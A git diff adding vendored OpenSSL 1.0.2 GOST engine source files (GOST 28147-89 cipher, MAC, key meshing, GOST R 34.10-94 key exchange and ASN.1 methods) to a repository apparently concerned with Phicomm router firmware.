+    n1 ^= f(c, n2 + c->k[3]);
+    n2 ^= f(c, n1 + c->k[4]);
+    n1 ^= f(c, n2 + c->k[5]);
+    n2 ^= f(c, n1 + c->k[6]);
+    n1 ^= f(c, n2 + c->k[7]);
+
+    n2 ^= f(c, n1 + c->k[0]);
+    n1 ^= f(c, n2 + c->k[1]);
+    n2 ^= f(c, n1 + c->k[2]);
+    n1 ^= f(c, n2 + c->k[3]);
+    n2 ^= f(c, n1 + c->k[4]);
+    n1 ^= f(c, n2 + c->k[5]);
+    n2 ^= f(c, n1 + c->k[6]);
+    n1 ^= f(c, n2 + c->k[7]);
+
+    n2 ^= f(c, n1 + c->k[0]);
+    n1 ^= f(c, n2 + c->k[1]);
+    n2 ^= f(c, n1 + c->k[2]);
+    n1 ^= f(c, n2 + c->k[3]);
+    n2 ^= f(c, n1 + c->k[4]);
+    n1 ^= f(c, n2 + c->k[5]);
+    n2 ^= f(c, n1 + c->k[6]);
+    n1 ^= f(c, n2 + c->k[7]);
+
+    n2 ^= f(c, n1 + c->k[7]);
+    n1 ^= f(c, n2 + c->k[6]);
+    n2 ^= f(c, n1 + c->k[5]);
+    n1 ^= f(c, n2 + c->k[4]);
+    n2 ^= f(c, n1 + c->k[3]);
+    n1 ^= f(c, n2 + c->k[2]);
+    n2 ^= f(c, n1 + c->k[1]);
+    n1 ^= f(c, n2 + c->k[0]);
+
+    out[0] = (byte) (n2 & 0xff);
+    out[1] = (byte) ((n2 >> 8) & 0xff);
+    out[2] = (byte) ((n2 >> 16) & 0xff);
+    out[3] = (byte) (n2 >> 24);
+    out[4] = (byte) (n1 & 0xff);
+    out[5] = (byte) ((n1 >> 8) & 0xff);
+    out[6] = (byte) ((n1 >> 16) & 0xff);
+    out[7] = (byte) (n1 >> 24);
+}
+
+/* Low-level decryption routine. Decrypts one 64-bit block */
+void gostdecrypt(gost_ctx * c, const byte * in, byte * out)
+{
+    register word32 n1, n2;     /* As named in the GOST */
+    n1 = in[0] | (in[1] << 8) | (in[2] << 16) | ((word32) in[3] << 24);
+    n2 = in[4] | (in[5] << 8) | (in[6] << 16) | ((word32) in[7] << 24);
+
+    n2 ^= f(c, n1 + c->k[0]);
+    n1 ^= f(c, n2 + c->k[1]);
+    n2 ^= f(c, n1 + c->k[2]);
+    n1 ^= f(c, n2 + c->k[3]);
+    n2 ^= f(c, n1 + c->k[4]);
+    n1 ^= f(c, n2 + c->k[5]);
+    n2 ^= f(c, n1 + c->k[6]);
+    n1 ^= f(c, n2 + c->k[7]);
+
+    n2 ^= f(c, n1 + c->k[7]);
+    n1 ^= f(c, n2 + c->k[6]);
+    n2 ^= f(c, n1 + c->k[5]);
+    n1 ^= f(c, n2 + c->k[4]);
+    n2 ^= f(c, n1 + c->k[3]);
+    n1 ^= f(c, n2 + c->k[2]);
+    n2 ^= f(c, n1 + c->k[1]);
+    n1 ^= f(c, n2 + c->k[0]);
+
+    n2 ^= f(c, n1 + c->k[7]);
+    n1 ^= f(c, n2 + c->k[6]);
+    n2 ^= f(c, n1 + c->k[5]);
+    n1 ^= f(c, n2 + c->k[4]);
+    n2 ^= f(c, n1 + c->k[3]);
+    n1 ^= f(c, n2 + c->k[2]);
+    n2 ^= f(c, n1 + c->k[1]);
+    n1 ^= f(c, n2 + c->k[0]);
+
+    n2 ^= f(c, n1 + c->k[7]);
+    n1 ^= f(c, n2 + c->k[6]);
+    n2 ^= f(c, n1 + c->k[5]);
+    n1 ^= f(c, n2 + c->k[4]);
+    n2 ^= f(c, n1 + c->k[3]);
+    n1 ^= f(c, n2 + c->k[2]);
+    n2 ^= f(c, n1 + c->k[1]);
+    n1 ^= f(c, n2 + c->k[0]);
+
+    out[0] = (byte) (n2 & 0xff);
+    out[1] = (byte) ((n2 >> 8) & 0xff);
+    out[2] = (byte) ((n2 >> 16) & 0xff);
+    out[3] = (byte) (n2 >> 24);
+    out[4] = (byte) (n1 & 0xff);
+    out[5] = (byte) ((n1 >> 8) & 0xff);
+    out[6] = (byte) ((n1 >> 16) & 0xff);
+    out[7] = (byte) (n1 >> 24);
+}
+
+/* Encrypts several blocks in ECB mode */
+void gost_enc(gost_ctx * c, const byte * clear, byte * cipher, int blocks)
+{
+    int i;
+    for (i = 0; i < blocks; i++) {
+        gostcrypt(c, clear, cipher);
+        clear += 8;
+        cipher += 8;
+    }
+}
+
+/* Decrypts several blocks in ECB mode */
+void gost_dec(gost_ctx * c, const byte * cipher, byte * clear, int blocks)
+{
+    int i;
+    for (i = 0; i < blocks; i++) {
+        gostdecrypt(c, cipher, clear);
+        clear += 8;
+        cipher += 8;
+    }
+}
+
+/* Encrypts several full blocks in CFB mode using 8byte IV */
+void gost_enc_cfb(gost_ctx * ctx, const byte * iv, const byte * clear,
+                  byte * cipher, int blocks)
+{
+    byte cur_iv[8];
+    byte gamma[8];
+    int i, j;
+    const byte *in;
+    byte *out;
+    memcpy(cur_iv, iv, 8);
+    for (i = 0, in = clear, out = cipher; i < blocks; i++, in += 8, out += 8) {
+        gostcrypt(ctx, cur_iv, gamma);
+        for (j = 0; j < 8; j++) {
+            cur_iv[j] = out[j] = in[j] ^ gamma[j];
+        }
+    }
+}
+
+/* Decrypts several full blocks in CFB mode using 8byte IV */
+void gost_dec_cfb(gost_ctx * ctx, const byte * iv, const byte * cipher,
+                  byte * clear, int blocks)
+{
+    byte cur_iv[8];
+    byte gamma[8];
+    int i, j;
+    const byte *in;
+    byte *out;
+    memcpy(cur_iv, iv, 8);
+    for (i = 0, in = cipher, out = clear; i < blocks; i++, in += 8, out += 8) {
+        gostcrypt(ctx, cur_iv, gamma);
+        for (j = 0; j < 8; j++) {
+            out[j] = (cur_iv[j] = in[j]) ^ gamma[j];
+        }
+    }
+}
+
+/* Encrypts one block using specified key */
+void gost_enc_with_key(gost_ctx * c, byte * key, byte * inblock,
+                       byte * outblock)
+{
+    gost_key(c, key);
+    gostcrypt(c, inblock, outblock);
+}
+
+/* Set 256 bit  key into context */
+void gost_key(gost_ctx * c, const byte * k)
+{
+    int i, j;
+    for (i = 0, j = 0; i < 8; i++, j += 4) {
+        c->k[i] =
+            k[j] | (k[j + 1] << 8) | (k[j + 2] << 16) | ((word32) k[j + 3] <<
+                                                         24);
+    }
+}
+
+/* Retrieve 256-bit key from context */
+void gost_get_key(gost_ctx * c, byte * k)
+{
+    int i, j;
+    for (i = 0, j = 0; i < 8; i++, j += 4) {
+        k[j] = (byte) (c->k[i] & 0xFF);
+        k[j + 1] = (byte) ((c->k[i] >> 8) & 0xFF);
+        k[j + 2] = (byte) ((c->k[i] >> 16) & 0xFF);
+        k[j + 3] = (byte) ((c->k[i] >> 24) & 0xFF);
+    }
+}
+
+/* Initalize context. Provides default value for subst_block */
+void gost_init(gost_ctx * c, const gost_subst_block * b)
+{
+    if (!b) {
+        b = &GostR3411_94_TestParamSet;
+    }
+    kboxinit(c, b);
+}
+
+/* Cleans up key from context */
+void gost_destroy(gost_ctx * c)
+{
+    int i;
+    for (i = 0; i < 8; i++)
+        c->k[i] = 0;
+}
+
+/*
+ * Compute GOST 28147 mac block Parameters gost_ctx *c - context initalized
+ * with substitution blocks and key buffer - 8-byte mac state buffer block
+ * 8-byte block to process.
+ */
+void mac_block(gost_ctx * c, byte * buffer, const byte * block)
+{
+    register word32 n1, n2;     /* As named in the GOST */
+    int i;
+    for (i = 0; i < 8; i++) {
+        buffer[i] ^= block[i];
+    }
+    n1 = buffer[0] | (buffer[1] << 8) | (buffer[2] << 16) | ((word32)
+                                                             buffer[3] << 24);
+    n2 = buffer[4] | (buffer[5] << 8) | (buffer[6] << 16) | ((word32)
+                                                             buffer[7] << 24);
+    /* Instead of swapping halves, swap names each round */
+
+    n2 ^= f(c, n1 + c->k[0]);
+    n1 ^= f(c, n2 + c->k[1]);
+    n2 ^= f(c, n1 + c->k[2]);
+    n1 ^= f(c, n2 + c->k[3]);
+    n2 ^= f(c, n1 + c->k[4]);
+    n1 ^= f(c, n2 + c->k[5]);
+    n2 ^= f(c, n1 + c->k[6]);
+    n1 ^= f(c, n2 + c->k[7]);
+
+    n2 ^= f(c, n1 + c->k[0]);
+    n1 ^= f(c, n2 + c->k[1]);
+    n2 ^= f(c, n1 + c->k[2]);
+    n1 ^= f(c, n2 + c->k[3]);
+    n2 ^= f(c, n1 + c->k[4]);
+    n1 ^= f(c, n2 + c->k[5]);
+    n2 ^= f(c, n1 + c->k[6]);
+    n1 ^= f(c, n2 + c->k[7]);
+
+    buffer[0] = (byte) (n1 & 0xff);
+    buffer[1] = (byte) ((n1 >> 8) & 0xff);
+    buffer[2] = (byte) ((n1 >> 16) & 0xff);
+    buffer[3] = (byte) (n1 >> 24);
+    buffer[4] = (byte) (n2 & 0xff);
+    buffer[5] = (byte) ((n2 >> 8) & 0xff);
+    buffer[6] = (byte) ((n2 >> 16) & 0xff);
+    buffer[7] = (byte) (n2 >> 24);
+}
+
+/* Get mac with specified number of bits from MAC state buffer */
+void get_mac(byte * buffer, int nbits, byte * out)
+{
+    int nbytes = nbits >> 3;
+    int rembits = nbits & 7;
+    int mask = rembits ? ((1 < rembits) - 1) : 0;
+    int i;
+    for (i = 0; i < nbytes; i++)
+        out[i] = buffer[i];
+    if (rembits)
+        out[i] = buffer[i] & mask;
+}
+
+/*
+ * Compute mac of specified length (in bits) from data. Context should be
+ * initialized with key and subst blocks
+ */
+int gost_mac(gost_ctx * ctx, int mac_len, const unsigned char *data,
+             unsigned int data_len, unsigned char *mac)
+{
+    byte buffer[8] = { 0, 0, 0, 0, 0, 0, 0, 0 };
+    byte buf2[8];
+    unsigned int i;
+    for (i = 0; i + 8 <= data_len; i += 8)
+        mac_block(ctx, buffer, data + i);
+    if (i < data_len) {
+        memset(buf2, 0, 8);
+        memcpy(buf2, data + i, data_len - i);
+        mac_block(ctx, buffer, buf2);
+        i += 8;
+    }
+    if (i == 8) {
+        memset(buf2, 0, 8);
+        mac_block(ctx, buffer, buf2);
+    }
+    get_mac(buffer, mac_len, mac);
+    return 1;
+}
+
+/* Compute MAC with non-zero IV. Used in some RFC 4357 algorithms */
+int gost_mac_iv(gost_ctx * ctx, int mac_len, const unsigned char *iv,
+                const unsigned char *data, unsigned int data_len,
+                unsigned char *mac)
+{
+    byte buffer[8];
+    byte buf2[8];
+    unsigned int i;
+    memcpy(buffer, iv, 8);
+    for (i = 0; i + 8 <= data_len; i += 8)
+        mac_block(ctx, buffer, data + i);
+    if (i < data_len) {
+        memset(buf2, 0, 8);
+        memcpy(buf2, data + i, data_len - i);
+        mac_block(ctx, buffer, buf2);
+        i += 8;
+    }
+    if (i == 8) {
+        memset(buf2, 0, 8);
+        mac_block(ctx, buffer, buf2);
+    }
+    get_mac(buffer, mac_len, mac);
+    return 1;
+}
+
+/* Implements key meshing algorithm by modifing ctx and IV in place */
+void cryptopro_key_meshing(gost_ctx * ctx, unsigned char *iv)
+{
+    unsigned char newkey[32], newiv[8];
+    /* Set static keymeshing key */
+    /* "Decrypt" key with keymeshing key */
+    gost_dec(ctx, CryptoProKeyMeshingKey, newkey, 4);
+    /* set new key */
+    gost_key(ctx, newkey);
+    /* Encrypt iv with new key */
+    gostcrypt(ctx, iv, newiv);
+    memcpy(iv, newiv, 8);
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/ccgost/gost89.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/ccgost/gost89.h
new file mode 100644
index 0000000..e5b877f
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/ccgost/gost89.h
@@ -0,0 +1,98 @@
+/**********************************************************************
+ *                        gost89.h                                    *
+ *             Copyright (c) 2005-2006 Cryptocom LTD                  *
+ *     This file is distributed under the same license as OpenSSL     *
+ *                                                                    *
+ *          Declarations for GOST 28147-89 encryption algorithm       *
+ *            No OpenSSL libraries required to compile and use        *
+ *                       this code                                    *
+ **********************************************************************/
+#ifndef GOST89_H
+# define GOST89_H
+
+/* Typedef for unsigned 32-bit integer */
+# if __LONG_MAX__ > 2147483647L
+typedef unsigned int u4;
+# else
+typedef unsigned long u4;
+# endif
+/* Typedef for unsigned 8-bit integer */
+typedef unsigned char byte;
+
+/* Internal representation of GOST substitution blocks */
+typedef struct {
+    byte k8[16];
+    byte k7[16];
+    byte k6[16];
+    byte k5[16];
+    byte k4[16];
+    byte k3[16];
+    byte k2[16];
+    byte k1[16];
+} gost_subst_block;
+
+/* Cipher context includes key and preprocessed  substitution block */
+typedef struct {
+    u4 k[8];
+    /* Constant s-boxes -- set up in gost_init(). */
+    u4 k87[256], k65[256], k43[256], k21[256];
+} gost_ctx;
+/*
+ * Note: encrypt and decrypt expect full blocks--padding blocks is caller's
+ * responsibility. All bulk encryption is done in ECB mode by these calls.
+ * Other modes may be added easily enough.
+ */
+/* Encrypt several full blocks in ECB mode */
+void gost_enc(gost_ctx * ctx, const byte * clear, byte * cipher, int blocks);
+/* Decrypt several full blocks in ECB mode */
+void gost_dec(gost_ctx * ctx, const byte * cipher, byte * clear, int blocks);
+/* Encrypts several full blocks in CFB mode using 8byte IV */
+void gost_enc_cfb(gost_ctx * ctx, const byte * iv, const byte * clear,
+                  byte * cipher, int blocks);
+/* Decrypts several full blocks in CFB mode using 8byte IV */
+void gost_dec_cfb(gost_ctx * ctx, const byte * iv, const byte * cipher,
+                  byte * clear, int blocks);
+
+/* Encrypt one  block */
+void gostcrypt(gost_ctx * c, const byte * in, byte * out);
+/* Decrypt one  block */
+void gostdecrypt(gost_ctx * c, const byte * in, byte * out);
+/* Set key into context */
+void gost_key(gost_ctx * ctx, const byte * key);
+/* Get key from context */
+void gost_get_key(gost_ctx * ctx, byte * key);
+/* Set S-blocks into context */
+void gost_init(gost_ctx * ctx, const gost_subst_block * subst_block);
+/* Clean up context */
+void gost_destroy(gost_ctx * ctx);
+/* Intermediate function used for calculate hash */
+void gost_enc_with_key(gost_ctx *, byte * key, byte * inblock,
+                       byte * outblock);
+/* Compute MAC of given length in bits from data */
+int gost_mac(gost_ctx * ctx, int hmac_len, const unsigned char *data,
+             unsigned int data_len, unsigned char *hmac);
+/*
+ * Compute MAC of given length in bits from data, using non-zero 8-byte IV
+ * (non-standard, for use in CryptoPro key transport only
+ */
+int gost_mac_iv(gost_ctx * ctx, int hmac_len, const unsigned char *iv,
+                const unsigned char *data, unsigned int data_len,
+                unsigned char *hmac);
+/* Perform one step of MAC calculation like gostcrypt */
+void mac_block(gost_ctx * c, byte * buffer, const byte * block);
+/* Extracts MAC value from mac state buffer */
+void get_mac(byte * buffer, int nbits, byte * out);
+/* Implements cryptopro key meshing algorithm. Expect IV to be 8-byte size*/
+void cryptopro_key_meshing(gost_ctx * ctx, unsigned char *iv);
+/* Parameter sets specified in RFC 4357 */
+extern gost_subst_block GostR3411_94_TestParamSet;
+extern gost_subst_block GostR3411_94_CryptoProParamSet;
+extern gost_subst_block Gost28147_TestParamSet;
+extern gost_subst_block Gost28147_CryptoProParamSetA;
+extern gost_subst_block Gost28147_CryptoProParamSetB;
+extern gost_subst_block Gost28147_CryptoProParamSetC;
+extern gost_subst_block Gost28147_CryptoProParamSetD;
+extern const byte CryptoProKeyMeshingKey[];
+typedef unsigned int word32;
+
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/ccgost/gost94_keyx.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/ccgost/gost94_keyx.c
new file mode 100644
index 0000000..85f4bc8
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/ccgost/gost94_keyx.c
@@ -0,0 +1,278 @@
+/**********************************************************************
+ *                             gost94_keyx.c                          *
+ *             Copyright (c) 2005-2006 Cryptocom LTD                  *
+ *         This file is distributed under the same license as OpenSSL *
+ *                                                                    *
+ *     Implements generation and parsing of GOST_KEY_TRANSPORT for    *
+ *              GOST R 34.10-94 algorithms                            *
+ *                                                                    *
+ *          Requires OpenSSL 0.9.9 for compilation                    *
+ **********************************************************************/
+#include <string.h>
+#include <openssl/dh.h>
+#include <openssl/rand.h>
+#include <openssl/evp.h>
+#include <openssl/objects.h>
+
+#include "gost89.h"
+#include "gosthash.h"
+#include "e_gost_err.h"
+#include "gost_keywrap.h"
+#include "gost_lcl.h"
+/* Common functions for both 94 and 2001 key exchange schemes */
+/*
+ * Implementation of the Diffi-Hellman key agreement scheme based on GOST-94
+ * keys
+ */
+
+/*
+ * Computes Diffie-Hellman key and stores it into buffer in little-endian
+ * byte order as expected by both versions of GOST 94 algorithm
+ */
+static int compute_pair_key_le(unsigned char *pair_key, BIGNUM *pub_key,
+                               DH *dh)
+{
+    unsigned char be_key[128];
+    int i, key_size;
+    key_size = DH_compute_key(be_key, pub_key, dh);
+    if (!key_size)
+        return 0;
+    memset(pair_key, 0, 128);
+    for (i = 0; i < key_size; i++) {
+        pair_key[i] = be_key[key_size - 1 - i];
+    }
+    return key_size;
+}
+
+/*
+ * Computes 256 bit Key exchange key as specified in RFC 4357
+ */
+static int make_cp_exchange_key(BIGNUM *priv_key, EVP_PKEY *pubk,
+                                unsigned char *shared_key)
+{
+    unsigned char dh_key[128];
+    int ret;
+    gost_hash_ctx hash_ctx;
+    DH *dh = DH_new();
+
+    if (!dh)
+        return 0;
+    memset(dh_key, 0, 128);
+    dh->g = BN_dup(pubk->pkey.dsa->g);
+    dh->p = BN_dup(pubk->pkey.dsa->p);
+    dh->priv_key = BN_dup(priv_key);
+    ret =
+        compute_pair_key_le(dh_key, ((DSA *)(EVP_PKEY_get0(pubk)))->pub_key,
+                            dh);
+    DH_free(dh);
+    if (!ret)
+        return 0;
+    init_gost_hash_ctx(&hash_ctx, &GostR3411_94_CryptoProParamSet);
+    start_hash(&hash_ctx);
+    hash_block(&hash_ctx, dh_key, 128);
+    finish_hash(&hash_ctx, shared_key);
+    done_gost_hash_ctx(&hash_ctx);
+    return 1;
+}
+
+/* EVP_PKEY_METHOD callback derive. Implements VKO R 34.10-94 */
+
+int pkey_gost94_derive(EVP_PKEY_CTX *ctx, unsigned char *key, size_t *keylen)
+{
+    EVP_PKEY *pubk = EVP_PKEY_CTX_get0_peerkey(ctx);
+    EVP_PKEY *mykey = EVP_PKEY_CTX_get0_pkey(ctx);
+    *keylen = 32;
+    if (key == NULL)
+        return 1;
+
+    return make_cp_exchange_key(gost_get0_priv_key(mykey), pubk, key);
+}
+
+/*
+ * EVP_PKEY_METHOD callback encrypt for GOST R 34.10-94 cryptopro
+ * modification
+ */
+
+int pkey_GOST94cp_encrypt(EVP_PKEY_CTX *ctx, unsigned char *out,
+                          size_t *outlen, const unsigned char *key,
+                          size_t key_len)
+{
+    GOST_KEY_TRANSPORT *gkt = NULL;
+    unsigned char shared_key[32], ukm[8], crypted_key[44];
+    const struct gost_cipher_info *param = get_encryption_params(NULL);
+    EVP_PKEY *pubk = EVP_PKEY_CTX_get0_pkey(ctx);
+    struct gost_pmeth_data *data = EVP_PKEY_CTX_get_data(ctx);
+    gost_ctx cctx;
+    int key_is_ephemeral = 1;
+    EVP_PKEY *mykey = EVP_PKEY_CTX_get0_peerkey(ctx);
+
+    /* Do not use vizir cipher parameters with cryptopro */
+    if (!get_gost_engine_param(GOST_PARAM_CRYPT_PARAMS)
+        && param == gost_cipher_list) {
+        param = gost_cipher_list + 1;
+    }
+
+    if (mykey) {
+        /* If key already set, it is not ephemeral */
+        key_is_ephemeral = 0;
+        if (!gost_get0_priv_key(mykey)) {
+            GOSTerr(GOST_F_PKEY_GOST94CP_ENCRYPT,
+                    GOST_R_NO_PRIVATE_PART_OF_NON_EPHEMERAL_KEYPAIR);
+            goto err;
+        }
+    } else {
+        /* Otherwise generate ephemeral key */
+        key_is_ephemeral = 1;
+        if (out) {
+            mykey = EVP_PKEY_new();
+            EVP_PKEY_assign(mykey, EVP_PKEY_base_id(pubk), DSA_new());
+            EVP_PKEY_copy_parameters(mykey, pubk);
+            if (!gost_sign_keygen(EVP_PKEY_get0(mykey))) {
+                goto err;
+            }
+        }
+    }
+    if (out)
+        make_cp_exchange_key(gost_get0_priv_key(mykey), pubk, shared_key);
+    if (data->shared_ukm) {
+        memcpy(ukm, data->shared_ukm, 8);
+    } else if (out) {
+        if (RAND_bytes(ukm, 8) <= 0) {
+            GOSTerr(GOST_F_PKEY_GOST94CP_ENCRYPT,
+                    GOST_R_RANDOM_GENERATOR_FAILURE);
+            goto err;
+        }
+    }
+
+    if (out) {
+        gost_init(&cctx, param->sblock);
+        keyWrapCryptoPro(&cctx, shared_key, ukm, key, crypted_key);
+    }
+    gkt = GOST_KEY_TRANSPORT_new();
+    if (!gkt) {
+        goto memerr;
+    }
+    if (!ASN1_OCTET_STRING_set(gkt->key_agreement_info->eph_iv, ukm, 8)) {
+        goto memerr;
+    }
+    if (!ASN1_OCTET_STRING_set(gkt->key_info->imit, crypted_key + 40, 4)) {
+        goto memerr;
+    }
+    if (!ASN1_OCTET_STRING_set
+        (gkt->key_info->encrypted_key, crypted_key + 8, 32)) {
+        goto memerr;
+    }
+    if (key_is_ephemeral) {
+        if (!X509_PUBKEY_set
+            (&gkt->key_agreement_info->ephem_key, out ? mykey : pubk)) {
+            GOSTerr(GOST_F_PKEY_GOST94CP_ENCRYPT,
+                    GOST_R_CANNOT_PACK_EPHEMERAL_KEY);
+            goto err;
+        }
+        if (out)
+            EVP_PKEY_free(mykey);
+    }
+    ASN1_OBJECT_free(gkt->key_agreement_info->cipher);
+    gkt->key_agreement_info->cipher = OBJ_nid2obj(param->nid);
+    *outlen = i2d_GOST_KEY_TRANSPORT(gkt, out ? &out : NULL);
+    if (*outlen <= 0) {
+        GOSTerr(GOST_F_PKEY_GOST94CP_ENCRYPT,
+                GOST_R_ERROR_PACKING_KEY_TRANSPORT_INFO);
+        goto err;
+    }
+    if (!key_is_ephemeral) {
+        /* Set control "public key from client certificate used" */
+        if (EVP_PKEY_CTX_ctrl(ctx, -1, -1, EVP_PKEY_CTRL_PEER_KEY, 3, NULL) <=
+            0) {
+            GOSTerr(GOST_F_PKEY_GOST94CP_ENCRYPT, GOST_R_CTRL_CALL_FAILED);
+            goto err;
+        }
+    }
+    GOST_KEY_TRANSPORT_free(gkt);
+    return 1;
+ memerr:
+    if (key_is_ephemeral) {
+        EVP_PKEY_free(mykey);
+    }
+    GOSTerr(GOST_F_PKEY_GOST94CP_ENCRYPT, GOST_R_MALLOC_FAILURE);
+ err:
+    GOST_KEY_TRANSPORT_free(gkt);
+    return -1;
+}
+
+/*
+ * EVP_PLEY_METHOD callback decrypt for GOST R 34.10-94 cryptopro
+ * modification
+ */
+int pkey_GOST94cp_decrypt(EVP_PKEY_CTX *ctx, unsigned char *key,
+                          size_t *key_len, const unsigned char *in,
+                          size_t in_len)
+{
+    const unsigned char *p = in;
+    GOST_KEY_TRANSPORT *gkt = NULL;
+    unsigned char wrappedKey[44];
+    unsigned char sharedKey[32];
+    gost_ctx cctx;
+    const struct gost_cipher_info *param = NULL;
+    EVP_PKEY *eph_key = NULL, *peerkey = NULL;
+    EVP_PKEY *priv = EVP_PKEY_CTX_get0_pkey(ctx);
+
+    if (!key) {
+        *key_len = 32;
+        return 1;
+    }
+
+    gkt = d2i_GOST_KEY_TRANSPORT(NULL, (const unsigned char **)&p, in_len);
+    if (!gkt) {
+        GOSTerr(GOST_F_PKEY_GOST94CP_DECRYPT,
+                GOST_R_ERROR_PARSING_KEY_TRANSPORT_INFO);
+        return 0;
+    }
+    eph_key = X509_PUBKEY_get(gkt->key_agreement_info->ephem_key);
+    if (eph_key) {
+        if (EVP_PKEY_derive_set_peer(ctx, eph_key) <= 0) {
+            GOSTerr(GOST_F_PKEY_GOST94CP_DECRYPT,
+                    GOST_R_INCOMPATIBLE_PEER_KEY);
+            goto err;
+        }
+    } else {
+        /* Set control "public key from client certificate used" */
+        if (EVP_PKEY_CTX_ctrl(ctx, -1, -1, EVP_PKEY_CTRL_PEER_KEY, 3, NULL) <=
+            0) {
+            GOSTerr(GOST_F_PKEY_GOST94CP_DECRYPT, GOST_R_CTRL_CALL_FAILED);
+            goto err;
+        }
+    }
+    peerkey = EVP_PKEY_CTX_get0_peerkey(ctx);
+    if (!peerkey) {
+        GOSTerr(GOST_F_PKEY_GOST94CP_DECRYPT, GOST_R_NO_PEER_KEY);
+        goto err;
+    }
+
+    param = get_encryption_params(gkt->key_agreement_info->cipher);
+    if (!param) {
+        goto err;
+    }
+
+    gost_init(&cctx, param->sblock);
+    OPENSSL_assert(gkt->key_agreement_info->eph_iv->length == 8);
+    memcpy(wrappedKey, gkt->key_agreement_info->eph_iv->data, 8);
+    OPENSSL_assert(gkt->key_info->encrypted_key->length == 32);
+    memcpy(wrappedKey + 8, gkt->key_info->encrypted_key->data, 32);
+    OPENSSL_assert(gkt->key_info->imit->length == 4);
+    memcpy(wrappedKey + 40, gkt->key_info->imit->data, 4);
+    make_cp_exchange_key(gost_get0_priv_key(priv), peerkey, sharedKey);
+    if (!keyUnwrapCryptoPro(&cctx, sharedKey, wrappedKey, key)) {
+        GOSTerr(GOST_F_PKEY_GOST94CP_DECRYPT,
+                GOST_R_ERROR_COMPUTING_SHARED_KEY);
+        goto err;
+    }
+
+    EVP_PKEY_free(eph_key);
+    GOST_KEY_TRANSPORT_free(gkt);
+    return 1;
+ err:
+    EVP_PKEY_free(eph_key);
+    GOST_KEY_TRANSPORT_free(gkt);
+    return -1;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/ccgost/gost_ameth.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/ccgost/gost_ameth.c
new file mode 100644
index 0000000..713a0fa
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/ccgost/gost_ameth.c
@@ -0,0 +1,917 @@
+/**********************************************************************
+ *                          gost_ameth.c                              *
+ *             Copyright (c) 2005-2006 Cryptocom LTD                  *
+ *         This file is distributed under the same license as OpenSSL *
+ *                                                                    *
+ *       Implementation of RFC 4490/4491 ASN1 method                  *
+ *       for OpenSSL                                                  *
+ *          Requires OpenSSL 0.9.9 for compilation                    *
+ **********************************************************************/
+#include <string.h>
+#include <openssl/crypto.h>
+#include <openssl/err.h>
+#include <openssl/engine.h>
+#include <openssl/evp.h>
+#include <openssl/asn1.h>
+#ifndef OPENSSL_NO_CMS
+# include <openssl/cms.h>
+#endif
+#include "gost_params.h"
+#include "gost_lcl.h"
+#include "e_gost_err.h"
+
+int gost94_nid_by_params(DSA *p)
+{
+    R3410_params *gost_params;
+    BIGNUM *q = BN_new();
+    for (gost_params = R3410_paramset; gost_params->q != NULL; gost_params++) {
+        BN_dec2bn(&q, gost_params->q);
+        if (!BN_cmp(q, p->q)) {
+            BN_free(q);
+            return gost_params->nid;
+        }
+    }
+    BN_free(q);
+    return NID_undef;
+}
+
+static ASN1_STRING *encode_gost_algor_params(const EVP_PKEY *key)
+{
+    ASN1_STRING *params = ASN1_STRING_new();
+    GOST_KEY_PARAMS *gkp = GOST_KEY_PARAMS_new();
+    int pkey_param_nid = NID_undef;
+
+    if (!params || !gkp) {
+        GOSTerr(GOST_F_ENCODE_GOST_ALGOR_PARAMS, ERR_R_MALLOC_FAILURE);
+        ASN1_STRING_free(params);
+        params = NULL;
+        goto err;
+    }
+    switch (EVP_PKEY_base_id(key)) {
+    case NID_id_GostR3410_2001:
+        pkey_param_nid =
+            EC_GROUP_get_curve_name(EC_KEY_get0_group
+                                    (EVP_PKEY_get0((EVP_PKEY *)key)));
+        break;
+    case NID_id_GostR3410_94:
+        pkey_param_nid =
+            (int)gost94_nid_by_params(EVP_PKEY_get0((EVP_PKEY *)key));
+        if (pkey_param_nid == NID_undef) {
+            GOSTerr(GOST_F_ENCODE_GOST_ALGOR_PARAMS,
+                    GOST_R_INVALID_GOST94_PARMSET);
+            ASN1_STRING_free(params);
+            params = NULL;
+            goto err;
+        }
+        break;
+    }
+    gkp->key_params = OBJ_nid2obj(pkey_param_nid);
+    gkp->hash_params = OBJ_nid2obj(NID_id_GostR3411_94_CryptoProParamSet);
+    /*
+     * gkp->cipher_params = OBJ_nid2obj(cipher_param_nid);
+     */
+    params->length = i2d_GOST_KEY_PARAMS(gkp, &params->data);
+    if (params->length <= 0) {
+        GOSTerr(GOST_F_ENCODE_GOST_ALGOR_PARAMS, ERR_R_MALLOC_FAILURE);
+        ASN1_STRING_free(params);
+        params = NULL;
+        goto err;
+    }
+    params->type = V_ASN1_SEQUENCE;
+ err:
+    GOST_KEY_PARAMS_free(gkp);
+    return params;
+}
+
+/*
+ * Parses GOST algorithm parameters from X509_ALGOR and modifies pkey setting
+ * NID and parameters
+ */
+static int decode_gost_algor_params(EVP_PKEY *pkey, X509_ALGOR *palg)
+{
+    ASN1_OBJECT *palg_obj = NULL;
+    int ptype = V_ASN1_UNDEF;
+    int pkey_nid = NID_undef, param_nid = NID_undef;
+    void *_pval;
+    ASN1_STRING *pval = NULL;
+    const unsigned char *p;
+    GOST_KEY_PARAMS *gkp = NULL;
+
+    X509_ALGOR_get0(&palg_obj, &ptype, &_pval, palg);
+    pval = _pval;
+    if (ptype != V_ASN1_SEQUENCE) {
+        GOSTerr(GOST_F_DECODE_GOST_ALGOR_PARAMS,
+                GOST_R_BAD_KEY_PARAMETERS_FORMAT);
+        return 0;
+    }
+    p = pval->data;
+    pkey_nid = OBJ_obj2nid(palg_obj);
+
+    gkp = d2i_GOST_KEY_PARAMS(NULL, &p, pval->length);
+    if (!gkp) {
+        GOSTerr(GOST_F_DECODE_GOST_ALGOR_PARAMS,
+                GOST_R_BAD_PKEY_PARAMETERS_FORMAT);
+        return 0;
+    }
